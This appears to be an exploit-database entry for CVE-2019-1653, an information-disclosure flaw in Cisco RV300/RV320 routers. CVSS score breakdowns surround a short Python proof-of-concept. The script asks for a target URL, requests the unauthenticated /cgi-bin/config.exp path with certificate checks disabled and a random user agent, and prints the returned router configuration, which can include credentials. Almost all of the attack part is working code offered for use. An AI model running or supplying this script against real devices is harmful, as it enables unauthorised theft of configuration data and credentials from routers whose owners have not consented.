7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
Cisco RV300 RV320 - Information Disclosure
# Exploit Title: 6coRV Exploit
# Date: 01-26-2018
# Exploit Author: Harom Ramos [Horus]
# Tested on: Cisco RV300/RV320
# CVE : CVE-2019-1653
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from fake_useragent import UserAgent
def random_headers():
return dict({'user-agent': UserAgent().random})
def request(url):
r = requests.Session()
try:
get = r.get(url, headers = random_headers(), timeout = 5, verify=False)#, allow_redirects=False
if get.status_code == 200:
return get.text
except requests.ConnectionError:
return 'Error Conecting'
except requests.Timeout:
return 'Error Timeout'
except KeyboardInterrupt:
raise
except:
return 0
print("")
print("##################################################")
print("CISCO CVE-2019-1653 POC")
print("From H. with love")
print("")
url = raw_input("URL> EX:http://url:port/ ")
url = url + "/cgi-bin/config.exp"
print(request(url))
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N